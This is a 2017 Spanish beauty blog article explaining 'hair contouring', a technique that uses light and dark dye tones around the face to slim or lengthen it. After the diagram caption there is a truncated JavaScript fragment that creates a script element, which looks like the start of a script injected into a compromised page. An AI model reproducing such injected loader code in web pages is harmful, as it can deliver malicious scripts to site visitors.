‘Hair contouring’, la técnica que hará que tu rostro se vea más delgado

¡Atención mujeres! El 2017 viene lleno de nuevas tendencias para el cabello y el hair contouring te va encantar.

Inspirado en la técnica de maquillaje favorito de las estrellas, el contouring no solo aplica para nuestro maquillaje. Este año llega para revolucionar nuestra melena y esculpir el rostro a través de la coloración.

Esta técnica consiste en definir tu rostro a través de distintas tonalidades en el cabello. El resultado que logra, es resaltar y corregir las facciones con un juego de luz y sombras con tintes claros y oscuros.

Los tintes se aplican en partes específicas y precisas del cabello que está alrededor del rostro, para lograr una ilusión óptica que ayuda a estilizar y verse más delgada. Pruébalo  en tonos rojizos, rubios y castaños.

¿Para todo tipo de rostro?

El hair contouring es ideal para todo tipo de rostro, ya que está diseñado para resaltar las características de la cara de manera personalizada.

Así como en el maquillaje, se usa sombra y luz para crear profundidad y resaltar las mejores facciones de la cara.

Se recomienda que se usen máximo 4 colores de tonalidad por arriba o por debajo de tu color, para que se vea un tono natural.

El uso de tonos más oscuros crean sombras que ayudan a lograr un rostro más delgado, mientras que los tonos claros crean la ilusión de tener un rostro más largo o ancho gracias a la luz.

Si tienes una cara redonda opta por los tonos oscuros cerca de las sienes y la mandíbula. Juega con los colores claros en el resto del cabello, para hacer tu rostro más alargado.

hair-contouring-diagramvar d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado